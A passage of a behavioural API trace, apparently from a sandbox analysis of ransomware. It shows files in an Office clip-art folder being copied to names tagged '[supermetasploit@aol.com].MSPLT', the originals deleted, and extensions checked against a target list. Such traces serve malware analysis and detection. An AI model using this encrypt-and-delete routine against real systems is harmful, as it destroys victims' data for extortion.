nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xbab0, lpOverlapped=0x0) returned 1 [0297.145] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.145] WriteFile (in: hFile=0x4c0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.146] SetEndOfFile (hFile=0x4c0) returned 1 [0297.146] CloseHandle (hObject=0x4c0) returned 1 [0297.148] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.148] SetEndOfFile (hFile=0x480) returned 1 [0297.159] CloseHandle (hObject=0x480) returned 1 [0297.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.160] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0297.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.162] lstrlenW (lpString=".doc") returned 4 [0297.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.162] lstrlenW (lpString=".docx") returned 5 [0297.162] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.162] lstrlenW (lpString=".pdf") returned 4 [0297.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.163] lstrlenW (lpString=".xls") returned 4 [0297.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.163] lstrlenW (lpString=".xlsx") returned 5 [0297.163] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.163] lstrlenW (lpString=".ppt") returned 4 [0297.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.163] lstrlenW (lpString=".zip") returned 4 [0297.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.163] lstrlenW (lpString=".rar") returned 4 [0297.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.163] lstrlenW (lpString=".bz2") returned 4 [0297.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.163] lstrlenW (lpString=".7z") returned 3 [0297.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.163] lstrlenW (lpString=".dbf") returned 4 [0297.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.163] lstrlenW (lpString=".1cd") returned 4 [0297.163] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.163] lstrlenW (lpString=".jpg") returned 4 [0297.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.164] lstrlenW (lpString=".doc") returned 4 [0297.164] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.164] lstrlenW (lpString=".docx") returned 5 [0297.164] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.164] lstrlenW (lpString=".pdf") returned 4 [0297.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.164] lstrlenW (lpString=".xls") returned 4 [0297.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.164] lstrlenW (lpString=".xlsx") returned 5 [0297.164] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.164] lstrlenW (lpString=".ppt") returned 4 [0297.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.164] lstrlenW (lpString=".zip") returned 4 [0297.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.164] lstrlenW (lpString=".rar") returned 4 [0297.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.164] lstrlenW (lpString=".bz2") returned 4 [0297.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.164] lstrlenW (lpString=".7z") returned 3 [0297.164] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.165] lstrlenW (lpString=".dbf") returned 4 [0297.165] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.165] lstrlenW (lpString=".1cd") returned 4 [0297.165] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0297.165] lstrlenW (lpString=".jpg") returned 4 [0297.165] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.165] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0297.165] lstrlenW (lpString="BD09662_.WMF") returned 12 [0297.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.168] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=20554) returned 1 [0297.168] CloseHandle (hObject=0x480) returned 1 [0297.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf")) returned 0x220 [0297.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.169] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.169] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0297.170] GetLastError () returned 0x0 [0297.170] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x504a, lpOverlapped=0x0) returned 1 [0297.173] WriteFile (in: hFile=0x464, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x5050, lpOverlapped=0x0) returned 1 [0297.175] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.175] WriteFile (in: hFile=0x464, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.175] SetEndOfFile (hFile=0x464) returned 1 [0297.175] CloseHandle (hObject=0x464) returned 1 [0297.177] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.177] SetEndOfFile (hFile=0x480) returned 1 [0297.181] CloseHandle (hObject=0x480) returned 1 [0297.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.182] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0297.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.183] lstrlenW (lpString=".doc") returned 4 [0297.183] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.183] lstrlenW (lpString=".docx") returned 5 [0297.183] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.183] lstrlenW (lpString=".pdf") returned 4 [0297.183] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.183] lstrlenW (lpString=".xls") returned 4 [0297.183] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.183] lstrlenW (lpString=".xlsx") returned 5 [0297.183] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.183] lstrlenW (lpString=".ppt") returned 4 [0297.183] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.183] lstrlenW (lpString=".zip") returned 4 [0297.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.183] lstrlenW (lpString=".rar") returned 4 [0297.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString=".bz2") returned 4 [0297.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString=".7z") returned 3 [0297.184] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.184] lstrlenW (lpString=".dbf") returned 4 [0297.184] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.184] lstrlenW (lpString=".1cd") returned 4 [0297.184] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.184] lstrlenW (lpString=".jpg") returned 4 [0297.184] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.184] lstrlenW (lpString=".doc") returned 4 [0297.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString=".docx") returned 5 [0297.184] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.184] lstrlenW (lpString=".pdf") returned 4 [0297.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.184] lstrlenW (lpString=".xls") returned 4 [0297.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.185] lstrlenW (lpString=".xlsx") returned 5 [0297.185] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.185] lstrlenW (lpString=".ppt") returned 4 [0297.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.185] lstrlenW (lpString=".zip") returned 4 [0297.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.185] lstrlenW (lpString=".rar") returned 4 [0297.185] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.185] lstrlenW (lpString=".bz2") returned 4 [0297.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.185] lstrlenW (lpString=".7z") returned 3 [0297.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.185] lstrlenW (lpString=".dbf") returned 4 [0297.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.185] lstrlenW (lpString=".1cd") returned 4 [0297.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0297.185] lstrlenW (lpString=".jpg") returned 4 [0297.185] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.186] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0297.186] lstrlenW (lpString="BD09664_.WMF") returned 12 [0297.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.187] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=7966) returned 1 [0297.187] CloseHandle (hObject=0x480) returned 1 [0297.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf")) returned 0x220 [0297.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.187] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.188] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0297.188] GetLastError () returned 0x0 [0297.188] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1f1e, lpOverlapped=0x0) returned 1 [0297.536] WriteFile (in: hFile=0x464, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1f20, lpOverlapped=0x0) returned 1 [0297.539] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.539] WriteFile (in: hFile=0x464, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.539] SetEndOfFile (hFile=0x464) returned 1 [0297.732] CloseHandle (hObject=0x464) returned 1 [0297.737] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.737] SetEndOfFile (hFile=0x480) returned 1 [0297.740] CloseHandle (hObject=0x480) returned 1 [0297.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.742] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0297.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.743] lstrlenW (lpString=".doc") returned 4 [0297.743] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.743] lstrlenW (lpString=".docx") returned 5 [0297.743] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.743] lstrlenW (lpString=".pdf") returned 4 [0297.743] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.743] lstrlenW (lpString=".xls") returned 4 [0297.743] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.743] lstrlenW (lpString=".xlsx") returned 5 [0297.744] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.744] lstrlenW (lpString=".ppt") returned 4 [0297.744] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.744] lstrlenW (lpString=".zip") returned 4 [0297.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.744] lstrlenW (lpString=".rar") returned 4 [0297.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.744] lstrlenW (lpString=".bz2") returned 4 [0297.744] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.744] lstrlenW (lpString=".7z") returned 3 [0297.744] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.744] lstrlenW (lpString=".dbf") returned 4 [0297.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.744] lstrlenW (lpString=".1cd") returned 4 [0297.744] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.744] lstrlenW (lpString=".jpg") returned 4 [0297.744] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.745] lstrlenW (lpString=".doc") returned 4 [0297.745] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.745] lstrlenW (lpString=".docx") returned 5 [0297.745] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.745] lstrlenW (lpString=".pdf") returned 4 [0297.745] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.745] lstrlenW (lpString=".xls") returned 4 [0297.745] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.745] lstrlenW (lpString=".xlsx") returned 5 [0297.745] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.745] lstrlenW (lpString=".ppt") returned 4 [0297.745] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.745] lstrlenW (lpString=".zip") returned 4 [0297.745] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.745] lstrlenW (lpString=".rar") returned 4 [0297.745] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.745] lstrlenW (lpString=".bz2") returned 4 [0297.745] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.745] lstrlenW (lpString=".7z") returned 3 [0297.745] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.745] lstrlenW (lpString=".dbf") returned 4 [0297.745] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.745] lstrlenW (lpString=".1cd") returned 4 [0297.745] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0297.746] lstrlenW (lpString=".jpg") returned 4 [0297.746] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.746] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0297.746] lstrlenW (lpString="BD19582_.GIF") returned 12 [0297.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.747] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=15733) returned 1 [0297.747] CloseHandle (hObject=0x480) returned 1 [0297.747] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif")) returned 0x220 [0297.747] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0297.748] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.748] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0297.749] GetLastError () returned 0x0 [0297.749] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x3d75, lpOverlapped=0x0) returned 1 [0297.755] WriteFile (in: hFile=0x464, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x3d80, lpOverlapped=0x0) returned 1 [0297.757] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, 